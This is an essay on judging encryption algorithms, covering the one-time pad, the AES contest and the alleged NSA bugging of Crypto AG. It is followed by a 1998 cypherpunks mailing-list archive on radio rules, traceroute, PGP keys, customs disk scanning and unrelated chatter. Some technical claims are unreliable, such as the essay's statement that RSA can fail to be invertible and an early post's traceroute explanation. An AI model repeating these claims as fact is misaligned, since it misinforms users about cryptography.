First, note that if the plaintext is longer than the ciphertext, then the
ciphertext is not invertible.  For example, let's suppose that the plaintext
is two bits long and the ciphertext is one bit long.



PlaintextCiphertext
0 00 or 1
0 11 or 0
1 0oops
1 1oops


After the first two ciphertext bits have been assigned to plaintext pairs,
the next two plaintext pairs (10,11) must conflict with this assignment. The
ciphertext thus correspondents to more than one plaintext possibility.

We run into problems for the reason that we cannot establish a one-to-one
correspondence between the plaintext and cipher text and, therefore, can't
possibly have an inverse.

Second, if the plaintext is shorter than the ciphertext, then the
ciphertext can't be trusted.  It may include too much information.  For
example, let's suppose that the plaintext is one bit long, the key is one
bit long, and the cipher text is two bits long.



Iran Cryptographic Algorithm
KeyPlaintextCiphertext
0  0        00        
0  1        10        
1  0        11        
1  1        01        


Not only is the above algorithm invertible, but now the crypto key has been sent
along with the ciphertext in the second bit position!

That is, the first bit in the ciphertext is is the value of (key XOR plaintext).
The second bit is the key itself.  So if you XOR the two ciphertext bits
with each other, you recover the plaintext bit.

You might ask who would be audacious enough to pull such  stunt.  The Great Satan,
of course.

For the story of how the National Security Agency (NSA) bugged the encryption
equipment that was sold by a Swiss company to 140 nations around the world, see
the following links:


http://www.aci.net/kalliste/speccoll.htm 


http://caq.com/cryptogate 


http://www.qainfo.se/~lb/crypto_ag.htm 


http://jya.com/whpfiles.htm



And the Great Satan got caught.  No plan B.  Or in crypto parlance, no second key.

So we have a third criterion for a cryptographic algorithm we might wish to adopt.



Criterion 3:  The length of the plaintext equals the length of the ciphertext.


In simple terms, if more bits come out of a crypto algorithm than go in, WATCH OUT!

Otis Mukinfuss and the Advanced Encryption Standard

Bruce Hawkinson (BHAWKIN@sandia.gov)
WAS Sandia National Laboratories Lab News editor some years ago.

In one editorial, Hawkinson wrote that while we was traveling for Sandia, he
spent his motel time looking up strange names in the phone book.  One name
I recall mentioned was Steely Gray who was a government office furniture
salesman.

Hawkinson concluded his article by writing his all-time favorite name was
Otis Mukinfuss.

Hawkinson was no longer editor of Sandia's Lab News shortly thereafter.

J. Orlin Grabbe has done an excellent job writing about cryptographic algorithms in

Cryptography and Number Theory for Digital Cash.

One inescapable conclusion from Grabbe's internet article is that from a layman's
standpoint public key cryptography is an incomprehensible mess.  A Muckinfuss.

The National Institute of Standards and Technology (NIST) is holding a CONTEST to select
an Advanced Encryption Standard to replace the
current Data Encryption Standard (DES).

Click through the candidates to view some additional examples of Mukinfusses.

So another criterion has been established for a cryptographic algorithm to be considered
for adoption.



Criterion 4:  The crypto algorithm must be simple and CONVINCE  EVERYONE that it is
             ONLY PERFORMING ITS SIMPLE INTENDED FUNCTION.


While we are at the NIST web site, the NIST Advanced Encryption Standard contest reminds
me of a the plot of a recent movie, The Game, starring Michael Douglas and Sean Penn:


        The film is a thriller directed by David Fincher (Se7en). "The Game"
        is what begins when a high-powered businessman named Nicholas Van 
        Orton (Douglas) receives the birthday gift of a lifetime from his 
        brother he alienated years ago (Penn). What Nicholas gets is entry 
        into a mysterious new form of entertainment provided by C.R.S. 
        (Consumer Recreational Services) simply called "The Game." It 
        proves to be an all-consuming contest with only one rule: there are 
        no rules. By the time Van Orton realizes he is in, it is too late to get 
        out.  ...
        (See 
                http://www.movietunes.com/soundtracks/1997/game/.)



NIST does not appear to publish any criteria for winning the AES contest!
Look at 
http://www.nist.gov/public_affairs/confpage/980820.htm and decide for
yourself.

Perfect Cryptography

Here we have described a process of encrypting a plaintext by XORing it
with a key of the same length.  This encryption technique is called a
"one-time pad", or Vernam cipher.  Just as long as each key is only used once,
the encryption technique is perfectly secure.

The one-time pad described here satisfies all criteria mentioned so far:


1. The ciphertext is invertible with the help of a key back into the plaintext.
2. There is ALWAYS a second key.  Just in case you get caught. 
3. The length of the plaintext equals the length of the ciphertext. 
4. The crypto algorithm must be simple and CONVINCE EVERYONE that it is 
    ONLY PERFORMING ITS SIMPLE INTENDED FUNCTION.


I  add



Criterion 5:  The length of the key must equal the length of the plaintext.


Extensive mathematics or complication fails Criterion 4.

Public key cryptograpy that uses the RSA algorithm MAY fail Criterion 1 if the 
message divides the product of the two prime numbers, p and q, used in the modulus.

Most crypto algorithms are designed so that the key cannot be recovered from a
plaintext-ciphertext pair.  Therefore, they fail Criterion 2.

Criterion 3 is much more difficult to ensure against.

Black and White Hats

American western movie producers used to aid their audiences in identification
of the heroes and villains.  The heroes wore white hats.  The villains, black hats.

US government agencies adopted the term 'black hatter' to describe an employee whose
job it is to break into THINGS. Or screw them up:
http://www.jya.com/whp1.htm

A 'white hatter' is one who analyzes THINGS to make sure they cannot be broken into.
And they can't be screwed up.

But the empirical fact is that the 'black hatters' can figure-out methods to transmit
the key on a covert channel, tell the 'white hatters' they did this.  And the 'white
hatters' can't find out how they did it.
                 
Algorithmic Processes

Suppose the key is five bits:

 1 0 1 0 1

Suppose the plaintext is six bits:

1 1 1 1 1 1

And the ciphertext is also six bits:

1 0 1 1 0 1

Ask the cryptographer give you a key which changes ONLY the sixth bit of the
ciphertext, as in the following:

1 0 1 1 0 0

You like the other 5 bits just fine.

If the cryptographer can't, then you might look for another algorithm to adopt.

Conclusion

We have five criteria to judge the outcome of the NIST Advanced Encryption Standard contest.

If none of the algorithms pass the five tests, we will not be discouraged.

We know that Gilbert S. Vernam and Joseph O. Mauborgne  solved the crytptography problem in 1918,
when they created the one-time pad.  (See

"What is a One-Time Pad?".)


William H. Payne               
P.O. Box 14838                 
Albuquerque, New Mexico 87191  
505-292-7037                   

Embedded Controller Forth. 

Generalized Feedback Shift Registers           

Here are some links to some of my students:

     
Ted Lewis (Friction-Free Economy)      
     
John Sobolewski (HPCERC)      

-30-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Thu, 10 Sep 1998 05:53:39 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Packet Radio
In-Reply-To: <3.0.5.32.19980909005149.0081d100@mail.xroads.com>
Message-ID: <35F7B0DA.CBD0CC07@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



What about SSB?

User of DOOM wrote:

> >>>>> William J Hartwell <billh@ibag.com> writes:
>
>   > I think a radio network linked to the Amateur networks sending
>   > secure packets, using tunneling or maybe just encrypted traffic
>
> FCC regulations prohibit amateur radio services from carrying either
> encrypted OR commercial traffic.  Either of these restrictions makes
> amateur radio networks useless for CP purposes.  And hams are very
> diligent at self-enforcement, often devoting hundreds of man-hours to
> track down a single unlicenced operator.
>
> Anyone who wishes to establish a network that may -- at any point in
> its life -- have to operate outside the "law" (whatever THAT happens
> to be at the time) will be well advised to steer clear of the amateur
> radio community.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Thu, 10 Sep 1998 10:29:15 +0800
To: "Kevin J. Stephenson" <kevin.stephenson@pobox.com>
Subject: Re: Spot The Fed
In-Reply-To: <199809100428.VAA17926@leroy.fbn.bc.ca>
Message-ID: <199809101544.IAA18377@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain



"Kevin J. Stephenson" <kevin.stephenson@pobox.com> wrote

> A lot of companies that get Net access never setup the reverse DNS entries
> out of sheer laziness on their assigned class C, and their upstream
> provider doesn't care. Feds probably have Class A and B addresses anyways.

Traceroute doesn't use DNS, it doesn't need to as it already has the 
IP numbers.  DNS is a system which provides IP numbers when you 
give it a domain name.  Reverse DNS provides a host name to an IP 
address but Traceroute doesn't use it.

Traceroute works at the router level.  Traceroute is like Ping but 
provides information on every hop including IP number and 
assigned device name.  With Traceroute if a host name is not 
received, when requested of course, it is because the equipment 
was not assigned a host name or it is deliberately suppressed.  I 
don't use Traceroute a lot but this is the first time I have seen host 
names suppressed.  

A lot of routers have ICM suppressed and will not provide a device 
name.  If an end user site wants to provide better security they will 
turn off ICM packets.  At that point Traceroute doesn't work at all.




Virtually

Raymond D. Mereniuk
Raymond@fbn.bc.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 10 Sep 1998 10:55:55 +0800
To: cypherpunks@cyberpass.net
Subject: Re: radio net (fwd)
Message-ID: <ba4f5c5deca6dd048c063992abf424a4@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



"Brian W. Buchanan" <brian@smarter.than.nu> writes:

>I'd love to see them try to enforce that.  What about chaffing and
>winnowing?  Stego?  Transmission of random noise? ;)  Anyone have the text
>of the actual rules concerning this?

I found what you're looking for.  I failed in my search at the FCC and ARRL web-sites, except for offers to purchase the applicable regulations in hardcopy.

C.F.R. 47, Part 97 covers the Amateur Radio Service.  The full set of regs is available at:

http://www.mv.com/ipusers/simons/al/radio/part97.html

The specific regulation you're looking for is at: 

http://www.mv.com/ipusers/simons/al/radio/part97_b.html#97.113

S 97.113 Prohibited transmissions. 

(a) No amateur station shall transmit: 

...
        (4) Music using a phone emission except as specifically

            provided elsewhere in this Section; communications

            intended to facilitate a criminal act; messages in
                                                   ^^^^^^^^^^^
            codes or ciphers intended to obscure the meaning
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
            thereof, except as otherwise provided herein;
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
            obscene or indecent words or language; or false

            or deceptive messages, signals or identification; 

...

The exception clause probably makes reference to an allowed "code", that being morse code.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Sep 1998 08:11:43 +0800
To: cypherpunks@toad.com
Subject: CJ Key Check
Message-ID: <199809101303.JAA31885@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Bear in mind that that information on this matter may be used to 
hammer or help Carl Johnson if not others.

As Adam Back has proposed: 

To check the validity of the allegations made by the IRS about 
Toto(s)'s messages in the Carl Johnson complaint, a review 
is underway of archived messages to see if there are any signatures 
by a key before the private key has been posted, especially if 
the post in question has been (or may be later) cited by the IRS.  

If there are none, then the IRS "authentication" of the claimed 
Toto posts evaporates.  Even if there are some, the `authentication' 
becomes more suspect if there are others which are made after the 
key post.

To assist checking messages an initial list of candidate keys is 
available (none of the anonymous keys show a link to Carl Johnson
of the IRS complaint):

   http://jya.com/anon-keys.htm

Additional candidates and findings of message checks are welcomed,
with a nod to the opening caution.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Sep 1998 11:20:58 +0800
To: Matthew James Gering <mgering@ecosystems.net>
Subject: Re: radio net (fwd)
In-Reply-To: <33CCFE438B9DD01192E800A024C84A19284623@mossbay.chaffeyhomes.com>
Message-ID: <35F7FCC0.30D4@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Matthew James Gering wrote:
> 
> Isn't there a similar ban on encryption-capable telephones and other
> electronic devices (other than computers).
> 
Not that I've ever heard of. Besides, what's the difference between a
crypto telephone and a computer? None that is significant.

>         Matt

I suspect that the reason that there aren't any $99 cryptophones at
Wal-Mart is that there really is not a significant market. The average
person just doesn't care. And the consumer electronics business is so
competitive and cost-sensitive that adding cost as a matter of principle
is just not going to happen. Oh, I suppose it's possible that anyone
trying to introduce a product like this could run into LEA interference
- endless audits, supplier problems, FCC approvals, you name it but lack
of market is probably the simplest explanation.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Thu, 10 Sep 1998 11:35:00 +0800
To: Ray Arachelian <sunder@brainlink.com>
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <35F7F329.E4836699@brainlink.com>
Message-ID: <199809101649.JAA18487@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian <sunder@brainlink.com> wrote

> Just out of curiosity what are prices around where you guys live?

In the Vancouver BC area they are trying to raise the price and the 
new standard is CAN$0.549 per litre, or US$1.37 per US gallon.  
Not difficult to find CAN$0.454/l or US$1.14/g.  For the last few 
weeks you could find CAN$0.399/l or US$1.00/g.  I often go to 
Blaine WA and the lowest available there is US$1.059.  Gas in 
Seattle WA is at least US$1.199.

> Ditto for militant vegans... it's one thing to do it for health reasons, it's
> another to be an asshole about killing fuzzy animals.. hey veggies are alive
> too.  If you're gonna murder veggies to live, (whose growth results in the
> death of millions of insects who would devour the veggies if not for
> insecticides) you may as well quit being a hypocrite and murder animals too...
> 
> The only way for a consciencious objecting vegan to not be a hypocrite is to
> simply stop eating and drinking and breathing... after all, every time he does
> so, he inhales, ingests, or otherwise murders billions of microbes... :)

Have you ever tried using this argument on a Vegetarian?  I have 
and they squirm in all directions attempting to rationalize their 
irrational position.  Basically some living things are more living than 
others.  Sort of reminds you of some politicians where it is obvious 
from their actions that some people are more equal than other 
people.





Virtually

Raymond D. Mereniuk
Raymond@fbn.bc.ca




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: EpicTeU@aol.com
Date: Thu, 10 Sep 1998 08:41:57 +0800
To: cypherpunks@toad.com
Subject: Re: Forwarded mail....
Message-ID: <ac6b25e2.35f7d5c5@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 98-09-10 01:11:05 EDT, you write:

<< Date: Wed, 9 Sep 1998 19:27:05 -0700 (PDT)
 From: Jrjeffro@aol.com
 
 HaCkaZ OnlY Da EliTeHelLO YaLL DiS is Da MaDD AAOOLL HaCka Ima startin a
GreWp fOR HaCs Only So In OthA WerDS yA gOttA KnOw The WAreZ anD HoW toO UsEr
FaTe AnD AOL So MaIl Or Im Me FoR Da TeTaIls If YeR LeeTo K Pe@CE FrOmE The
LeeTs HacKJeFFrO) >>

What the hell is this? 
No wonder why AOLers have a bad name Im going to Flame this guy 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Sep 1998 11:38:31 +0800
To: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Subject: oil, Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809082359.SAA12044@einstein.ssz.com>
Message-ID: <35F8010C.35E5@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Raymond D. Mereniuk wrote:
> > oil, the arabs will slip back into obscurity.
> 
Can't wait.

> Good point!  Ever wonder why a decreasing commodity non-
> renewable resource is becoming cheaper as the known reserves
> become smaller?
> 
> Maybe they want to sell it all before it becomes obsolete and
> maximize their income from that resource.
> 
> Within the oil business I have heard this mentioned in regards to
> natural gas.
> 
I remember going to hear a Cornell geophysicist speak on this subject
about 17 years ago. The gist of his talk was that the porosity of the
mantle material had some unexpected variation vs. depth. This, along
with the nature of the natural gas fields in Louisiana and the content
profile of some oil reserves indicated a large amount of natural gas
reserves as part of the deeper structure. I don't know where this ever
went but it was pretty interesting at the time.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Sep 1998 11:51:25 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Computer hard disc scanning by HM Customs & Excise
In-Reply-To: <3.0.5.32.19980909143613.00c51da0@idiom.com>
Message-ID: <35F80407.5303@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart wrote:
> 
> >> > Just set the BIOS not to boot to floppy,
> >> If the customs people have any clue, the first thing they do
> >> is hit DEL at the appropriate BIOS prompt
> >I think you give them WAY too much credit, not to mention many systems
> >give no such prompt. But highly suspect if anything they will check the
> >BIOS *after* first not being able to boot to floppy successfully.
> 
> Any tax-collector who's illiterate enough to ask "Do you have Internet
> on your computer" is probably not going to know what's happening,
> especially given the disparity of system boot behaviour.
> 
> Some things may get their attention, like the sound card yelling
>         "Begin destruct sequence!  10, 9, 8, 7....."
> or, more politely,
>         "Stop, thief!  Help, someone is stealing this computer!"
> or      "Virus detected.  Please remove the infected diskette
>         and contact corporate security for further instructions"
> but your basic subtleties like a Linux boot screen and
> copying the diskette to backup and then wiping it are
> beyond the typical border guard's technical training, and
> don't smell interesting enough to get his dog's attention
> (unless there's a good high-pitched tone as well.)
> 
> I may post a more thoughtful article about the offensiveness of this
> practice or the technical cluelessness, but for now I'll just
> rant about the sheer folly of allowing anybody to touch your computer
> whose primary training is in Shouting and looking for people who
> match profiles, like Irish accents or obvious wealth or obvious poverty.
> 
The practice is as offensive as the KGB-like DWI roadblocks but don't be
so hasty to assume the long-term incompetence of the federales in any
country. If the interest in scanning PC's persists, or *dammit*
increases, there will be increased funding and somebody who is
technically capable will provide more sophisticated analysis tools.
Period. Better get used to it. I doubt the issue will just go away.
Design your CM accordingly.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@iq.org>
Date: Thu, 10 Sep 1998 05:10:42 +0800
To: cypherpunks@Algebra.COM
Subject: cypherpunks archive
Message-ID: <19980910100541.10897.qmail@iq.org>
MIME-Version: 1.0
Content-Type: text/plain




I'm looking for a/the cypherpunks archive, particularly one that
covers 92-present. infinity.nus.sg doesn't seem to work anymore.

Cheers,
Julian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Thu, 10 Sep 1998 04:24:48 +0800
To: Adam Back <jimg@mentat.com
Subject: Re: Carl Johnson's private key
In-Reply-To: <199809092006.NAA10324@zendia.mentat.com>
Message-ID: <19980910102249.B27659@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Sep 09, 1998 at 10:25:15PM +0100, Adam Back wrote:

> Well let's see how many Toto keys we can find which were posted to
> cpunks.

Type Bits KeyID      Created    Expires    Algorithm       Use
pub  2048 0xE839FC79 1997-05-21 ---------- RSA             Sign & Encrypt 
uid  TruthMonger <tm@dev.null>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENAzOCm1EAAAEIANB5WCFbEjUhNaZ2cEWuh9xcP48QBixzJpxPqGc0Sogj9W1L
ezM5GDF0tZp5ksNbWf5+ErNxXo0yOM7LjDl+sRrEmcbuTkjqPJxG/q4JZ7Al3/FF
h1SFGWpQNz9BPewgHS8/Lp9Ywl+ELeau+FPrr/xmktYifBBaaPUTS5oNMhn4Ih0r
yez6WFn6lRYz+FLsXchjkg+I22tC1aD6iKv/BxCM//GzJ8UNkE7Vx94jZxJ/0vqE
3msqN1coj99okoggWzR5xe/wcLjUjXBw4Z208zhKNEC1AemkJV5HSbztfOgpZOqX
4dwsSDREfFcerM3gusIv3Gz+oU5WPTNSVeg5/HkABRG0GVRydXRoTW9uZ2VyIDx0
bUBkZXYubnVsbD6JAJUDBRM00a/ErW/ok9nGnfkBAcRtBACrvPVTRqpDGpb9xn97
Km69dtRfrbObvBDpcMwu1iQrYfuBfoqaMgxq8SCMjtstbTwWpZE26xzpgLQ36VBk
Zjwv/5qPJMutaImDEriulrJPy6LtqHQ13tOu1WK3q/tYSeW3rJUz+5vgKDhpkEIH
RJEc9CVkn4nIQvH/WXwEmAXX2okBFQMFEDOCm1E9M1JV6Dn8eQEBdR4H/jLf9WVT
O5rxNVsCJNYo9e+pOrbxceuE2tOINZdfspoWZHJkLbQ4ttE20kfVclR5m/vKHFeQ
g7aNbp7WL3kxZzHQkCF42N2ooB00VRVqqzpHb7JIBTs+19t9XH9FTGxNbyMt+mkj
tqNN/cT3Pe6c7o2k3/PvgM7rn22LB82NPxihEfcQSiZIo1nfIgaFvJMe/4U6smzy
xDeOGqYVvfuevR6vX4FaL1KvYtLtor6IIr9kqFSpqh+SijpL8zqdNYpTtGIOG8rT
CbjQtqyxvzfPc2PA3Y01kPAI9gzd3XYuPFYDvSqWPH+qxJGm2+QOacspecRS9Oyd
/10SuGlgu2DIYEWJAJUDBRAzgtb/sF+MkGb7jGUBARskA/9Gwpn+SE5L7icPsl8+
cowoxWMM6J/HR6ePN/uRb/8acyyLvTJpiLpB6hPRhRhU1D7BbAZQ+AB6OzY8uTVU
hufgYi9FT7VSPrFNN8eQiJtS2/Psu0L8mY1p9ZIRMOck6WqzODNOcTR24PBnzchJ
Z3MeSERed8IHFw9rLvm7XMLoVA==
=fA4n
-----END PGP PUBLIC KEY BLOCK-----

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Sep 1998 10:21:42 +0800
To: cypherpunks@cyberpass.net
Subject: Archives and such - I can host these...
Message-ID: <35F7EE0B.C3E97955@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



If the folks that run or ran archives need a mirror site to host their mirrors,
I can happily provide space for them on sundernet.  I've plenty of space on the
drive, and if not I can get more spindles for it...

If you have already written perl scripts to archive incoming mail I'd put those
up too... 

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Thu, 10 Sep 1998 04:32:16 +0800
To: Nobuki Nakatuji <bd1011@hotmail.com>
Subject: Re: MISTY encryption algorithm source code
In-Reply-To: <19980910035745.18097.qmail@hotmail.com>
Message-ID: <35F79AEE.1F8CAB7@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Nobuki Nakatuji wrote:
> 
> MISTY source code posted by me at long ago had many mistake.
> Attachment file are revised MISTY source code and revised readme.
> Thanks.

Can you give good literature references to MISTY?

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Thu, 10 Sep 1998 10:44:47 +0800
To: raymond@fbn.bc.ca
Subject: Re: oil, greens, recycling, and poly-ticks.
In-Reply-To: <199809092123.OAA17355@leroy.fbn.bc.ca>
Message-ID: <35F7F329.E4836699@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Raymond D. Mereniuk wrote:

> Now we have cheap oil.  Big powerful vehicles are back and we are
> not embarrassed to consume energy any more.  I have no idea
> where society is heading but I do like have a more powerful vehicle
> which capable of passing a vehicle already doing 65 MPH.

What pisses me off is that in NYC the gas prices are ridiculous high...
$1.35/Gal is the regular gas, drive just a few miles over a tunnel or bridge 
to n NJ, it's $1.00 or $.99 depending on which pump you hit...  go a bit south,
say VA, and in some areas it drops as low as $0.87 a gallon!

Shit, if it weren't for the tolls and the drive, I'd be getting my gas out of
NYC all the time, but doing so wastes enough and costs enough in tolls to not
make it worth the effort...

Just out of curiosity what are prices around where you guys live?
 
> The whole Greens or tree-hugger thing is a bit hypocritical.  Ask
> them if they have electrical appliances in their home and the answer
> is always yes.  For a number of years the Greenpeace fundraisers
> would show up at the door asking for money to battle the forest
> industry and the evil pulp mills which used chlorine in their bleaching
> process and they would have white paper in their clipboards.

Yep... saw one at Barnes & Noble a while ago bitching about how he got a
plastic bag.  We'll, if he's worried that plastic is bad for the environment,
he should worry about the murdered tree in his hand that he just purchased...

Ditto for militant vegans... it's one thing to do it for health reasons, it's
another to be an asshole about killing fuzzy animals.. hey veggies are alive
too.  If you're gonna murder veggies to live, (whose growth results in the
death of millions of insects who would devour the veggies if not for
insecticides) you may as well quit being a hypocrite and murder animals too...

The only way for a consciencious objecting vegan to not be a hypocrite is to
simply stop eating and drinking and breathing... after all, every time he does
so, he inhales, ingests, or otherwise murders billions of microbes... :)

(Whenever someone asks if I have special dietary needs, I say "I'm a carnivore,
make sure you've got plenty of red meat!") :)

By far the worst is the recycling law in NYC.  If you don't recycle your trash,
you get fined.  If a homeless bum sticks his hand in a recycling bin and grabs
a paper he gets arrested for theft of government property, etc...  If someone
throws a can of soda in your trash bins infront of your house, you pay a $50
fine...  A while back some may remeber the "Toilet Escrow" thread... yep that
too has hit New York.  Every toilet in our apt building was exchanged for one
that supposedly saves water... Whatever the political and economic kickbacks
were, it now takes an average of three flushes to sink a bowlful of turds... 
My math says that's a lot more wasted water than the single flush of the old
toilet.


-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 10 Sep 1998 13:44:30 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Spot The Fed
Message-ID: <33CCFE438B9DD01192E800A024C84A19284637@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Traceroute doesn't use DNS? Whatever.

And it's ICMP, Internet Control Management Protocol.

The original traceroute works by sending User Datagram Protocol (UDP)
datagrams (default 3) to an invalid port address of a remote host,
starting with a Time-To-Live (TTL) of 1 causing the first router in the
path to return an ICMP Time Exceeded Message (TEM), traceroute
increments the TTL by one (up the max hop count, default 30) and
resends, reaching the next router, until an ICMP Destination Unreachable
Message is returned indicating the unreachable port on the destination
host.

The IP addresses of the hops are determined by the return packet
headers, there is no hostname. Reverse DNS lookup is used to give you
the host names, which can be turned on or off in the traceroute options
(it's much faster if you turn it off).

Traceroute was a diagnostic kludge. RFC 1393 describes and ICMP-based
traceroute function, whereby traceroute sends an ICMP trace message (see
the RFC for details) but there is still no hostname on the return
packet, DNS is still used.

Certain ICMP messages are often disabled and/or certain ports blocked or
"shaped" by routers under thresholds to prevent common Denial-of-Service
(DoS) attacks.

	Matt



> -----Original Message-----
> From: Raymond D. Mereniuk [mailto:Raymond@fbn.bc.ca]

> Traceroute doesn't use DNS, it doesn't need to as it already has the 
> IP numbers.  DNS is a system which provides IP numbers when you 
> give it a domain name.  Reverse DNS provides a host name to an IP 
> address but Traceroute doesn't use it.
> 
> Traceroute works at the router level.  Traceroute is like Ping but 
> provides information on every hop including IP number and 
> assigned device name.  With Traceroute if a host name is not 
> received, when requested of course, it is because the equipment 
> was not assigned a host name or it is deliberately suppressed.  I 
> don't use Traceroute a lot but this is the first time I have 
> seen host names suppressed.  
> 
> A lot of routers have ICM suppressed and will not provide a device 
> name.  If an end user site wants to provide better security they will 
> turn off ICM packets.  At that point Traceroute doesn't work at all.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 10 Sep 1998 11:53:44 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Citizenship silliness.  Re: e$: crypto-expatriatism (fwd)
In-Reply-To: <199809100116.UAA18005@einstein.ssz.com>
Message-ID: <v0311070bb21dafd16ba2@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:15 PM -0500 9/9/98, Jim Choate wrote:
>Forwarded message:
>> 	Put about 2% detergent (just about any grade will do) into that
>> "water spray", and the fire goes out quicker, and stays out longer.
>
>That'll work for gasoline because soap and gasoline are soluble. I doubt it
>would work very well for alcohol but once I get this mess with the tree
>straightened out I'll do a little backyard experiment.
>
>What I had in mind was to pour some alcohol on the concrete drive way and
>light it. Then use a waterbottle with a water/soap mix. Do you think that
>would be a suitable simulation?

	No.

	I know just a bit about Fuel Fires as I worked in Aircraft
Firefighting  and Resuce for Uncle Sams Miserable Children in the last 1/2
of the 80's.

	The point of using the detergent has nothing to do with it's
solubility in gasoline/kerosene (I have much more experience with JP5 than
gas, and JP5 is basically a high grade kerosene/diesel), but rather it is
there to break up the water tension & allow the water to "float" on top of
the gas/oil/whatever. It also improves (somewhat) the "wetting" properties
of water, allowing it to saturate porus material (wood, newspaper rolls
whatever) better.

>> 	There are plenty of unused roof tops here in Chicago bouncing free
>> energy off into the air.
>Yep, use the roof of every 10+ houses to power a single house...

	Actually, by using solar heating/cooling techiques instead of
(ineffecient) conversion to electicity, you can save MUCH more energy.

>Ok, so we let PART of the people starve and die in the dark.

	And the problem here is...

>> 	The waste problem goes away of you build a decently stable launch
>> platform and drop the shit into the sun.
>
>We don't have engines at this point that can do that. The fact is that it
>takes more energy to get to the sun than it does to leave the solar system.
>Nope, not the answer. (I do experimental, ie big bird, rockets for grins and
>giggles)

	I don't see how, you just get it up there inside the orbit of the
earth, and let gravity do the rest.

>> "power sats" into orbit (altho I am not real clear on how the energy gets
>> back down, something about using microwaves <shrug>)
>
>Microwaves, and god help you if you happen to fly through one. I won't even
>talk about the costs of development, control, maintenance, etc. This won't
>fly any time in the next couple of hundred years at least. What about the
>heating of the water in the air, can you say global warming on a scale that
>would make the current issues irrelevant.

	Like I said, I wasn't too sure on the last one.

>> 	Also, you ignored, or didn't see the "mix of" statement. Oil CAN be
>> replaced, and should be. There are plenty of ways to replace the energy
>
>Absolutely, I want to replace it. I want to replace it with something that
>is renewable, won't have the ecological impact of the others, won't squeeze
>the small countries out, etc. If it requires killing a single salamander
>then it's the wrong choice simply to make a profit.

	I don't mind killing a salamander or 100, but I don't want my
electric supply, and it's attendant costs to be dependent on ONE
